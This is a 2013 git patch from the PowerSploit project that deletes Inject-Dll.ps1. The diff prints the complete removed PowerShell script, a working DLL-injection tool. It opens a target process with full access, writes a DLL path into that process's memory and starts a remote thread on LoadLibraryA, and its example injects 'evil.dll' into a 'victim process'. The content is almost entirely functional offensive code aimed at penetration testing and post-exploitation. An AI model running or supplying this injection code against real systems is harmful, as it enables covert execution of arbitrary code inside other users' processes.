From 6e42ba1d39b24ef8a5f3063b7806a07c8b33cc14 Mon Sep 17 00:00:00 2001 From: bitform Date: Sun, 20 Jan 2013 21:35:56 -0500 Subject: Moved scripts to their respective modules. --- Inject-Dll.ps1 | 326 --------------------------------------------------------- 1 file changed, 326 deletions(-) delete mode 100644 Inject-Dll.ps1 (limited to 'Inject-Dll.ps1') diff --git a/Inject-Dll.ps1 b/Inject-Dll.ps1 deleted file mode 100644 index ead4753..0000000 --- a/Inject-Dll.ps1 +++ /dev/null @@ -1,326 +0,0 @@ -function Inject-Dll { - -<# -.SYNOPSIS - - PowerSploit Module - Inject-Dll - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - -.DESCRIPTION - - Inject-Dll injects a Dll into the process ID of your choosing. - -.PARAMETER ProcessID - - Process ID of the process you want to inject a Dll into. - -.PARAMETER Dll - - Name of the dll to inject. This can be an absolute or relative path. - -.EXAMPLE - - C:\PS> Inject-DLL -ProcessID 4274 -Dll evil.dll - - Description - ----------- - Inject 'evil.dll' into process ID 4274. - -.NOTES - - Use the '-Verbose' option to print detailed information. - -.LINK - - http://www.exploit-monday.com -#> - - Param ( - [Parameter( Position = 0, - Mandatory = $True )] - [Int] - $ProcessID, - - [Parameter( Position = 1, - Mandatory = $True )] - [String] - $Dll - ) - - # Confirm that the process you want to inject into exists - try - { - Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null - } - catch [System.Management.Automation.ActionPreferenceStopException] - { - Throw "Process does not exist!" - } - - # Confirm that the path to the dll exists - try - { - $Dll = (Resolve-Path $Dll -ErrorAction Stop).Path - Write-Verbose "Full path to Dll: $Dll" - $AsciiEncoder = New-Object System.Text.ASCIIEncoding - # Save the name of the dll in an ascii-encoded format. This name will be injected into the remote process. - $DllByteArray = $AsciiEncoder.GetBytes($Dll) - } - catch [System.Management.Automation.ActionPreferenceStopException] - { - Throw "Invalid Dll path!" - } - - function Local:Get-DelegateType - { - Param - ( - [OutputType([Type])] - - [Parameter( Position = 0)] - [Type[]] - $Parameters = (New-Object Type[](0)), - - [Parameter( Position = 1 )] - [Type] - $ReturnType = [Void] - ) - - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) - $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) - $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) - $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') - $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) - $MethodBuilder.SetImplementationFlags('Runtime, Managed') - - Write-Output $TypeBuilder.CreateType() - } - - function Local:Get-ProcAddress - { - Param - ( - [OutputType([IntPtr])] - - [Parameter( Position = 0, Mandatory = $True )] - [String] - $Module, - - [Parameter( Position = 1, Mandatory = $True )] - [String] - $Procedure - ) - - # Get a reference to System.dll in the GAC - $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | - Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } - $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') - # Get a reference to the GetModuleHandle and GetProcAddress methods - $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') - $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') - # Get a handle to the module specified - $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) - $tmpPtr = New-Object IntPtr - $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - - # Return the address of the function - Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) - } - - function Local:Get-PEArchitecture - { - Param - ( - [Parameter( Position = 0, - Mandatory = $True )] - [String] - $Path - ) - - # Parse PE header to see if binary was compiled 32 or 64-bit - $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) - - [Byte[]] $MZHeader = New-Object Byte[](2) - $FileStream.Read($MZHeader,0,2) | Out-Null - - $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) - if ($Header -ne 'MZ') - { - $FileStream.Close() - Throw 'Invalid PE header.' - } - - # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header) - $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null - - [Byte[]] $lfanew = New-Object Byte[](4) - - # Read offset to the PE Header (will be read in reverse) - $FileStream.Read($lfanew,0,4) | Out-Null - $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join '')) - - # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE - $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null - [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) - - # Read compiled architecture - $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null - $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') - $FileStream.Close() - - if (($Architecture -ne '014C') -and ($Architecture -ne '8664')) - { - Throw 'Invalid PE header or unsupported architecture.' - } - - if ($Architecture -eq '014C') - { - Write-Output 'X86' - } - elseif ($Architecture -eq '8664') - { - Write-Output 'X64' - } - else - { - Write-Output 'OTHER' - } - } - - - # Get addresses of and declare delegates for essential Win32 functions. - $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess - $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) - $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) - $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx - $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr]) - $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate) - $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx - $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32]) ([Bool]) - $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate) - $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory - $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]) - $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate) - $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread - $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) - $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate) - $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle - $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) - $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) - - # Assume CPU to be 64-bit unless determined otherwise. - $64bitCPU = $True - - # Determine the bitness of the running PowerShell process based upon the size of the IntPtr type. - if ([IntPtr]::Size -eq 4) - { - $PowerShell32bit = $True - } - else - { - $PowerShell32bit = $False - } - - # The address for IsWow64Process will be returned if and only if running on a 64-bit CPU. Otherwise, Get-ProcAddress will return $null. - $IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process - - if ($IsWow64ProcessAddr) - { - $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) - $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) - } - else - { - # IsWow64Process does not exist and thus, the CPU is not 64-bit. - $64bitCPU = $False - } - - # Open a handle to the process you want to inject into - $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF) - - if (!$hProcess) - { - THrow 'Unable to open process handle.' - } - - $Architecture = Get-PEArchitecture $Dll - - if ($64bitCPU) # Only perform theses checks if CPU is 64-bit - { - if ( ($Architecture -ne 'X86') -and ($Architecture -ne 'X64') ) - { - Throw 'Only x86 or AMD64 architechtures supported.' - } - - # Determine is the process specified is 32 or 64 bit. Assume that it is 64-bit unless determined otherwise. - $IsWow64 = $False - $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null - - if ( $PowerShell32bit -and ($Architecture -eq 'X64') ) - { - Throw 'You cannot manipulate 64-bit code within 32-bit PowerShell. Open the 64-bit version and try again.' - } - - if ( (!$IsWow64) -and ($Architecture -eq 'X86') ) - { - Throw 'You cannot inject a 32-bit DLL into a 64-bit process.' - } - - if ( $IsWow64 -and ($Architecture -eq 'X64') ) - { - Throw 'You cannot inject a 64-bit DLL into a 32-bit process.' - } - } - else - { - if ($Architecture -ne 'X86') - { - Throw 'PE file was not compiled for x86.' - } - } - - # Get address of LoadLibraryA function - $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA - Write-Verbose "LoadLibrary address: 0x$($LoadLibraryAddr.ToString("X$([IntPtr]::Size*2)"))" - - # Reserve and commit memory to hold name of dll - $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Dll.Length, 0x3000, 4) # (0x3000 = Reserve|Commit, 4 = RW) - if ($RemoteMemAddr -eq [IntPtr]::Zero) - { - Throw 'Unable to allocate memory in remote process.' - } - Write-Verbose "DLL path memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))" - - # Write the name of the dll to the remote process address space - $WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $DllByteArray, $Dll.Length, [Ref] 0) | Out-Null - Write-Verbose "Dll path written sucessfully." - - # Execute dll as a remote thread - $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $LoadLibraryAddr, $RemoteMemAddr, 0, [IntPtr]::Zero) - if (!$ThreadHandle) - { - Throw 'Unable to launch remote thread.' - } - - $VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000) - - # Close process handle - $CloseHandle.Invoke($hProcess) | Out-Null - - Write-Verbose 'Dll injection complete!' - - # Extract just the filename from the provided path to the dll. - $FileName = Split-Path $Dll -Leaf - $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.Contains($FileName) } | fl * | Out-String - - if (!$DllInfo) - { - Throw "Dll did dot inject properly into the victim process." - } - - Write-Verbose "Injected DLL information:$($DllInfo)" -} \ No newline at end of file -- cgit v1.2.3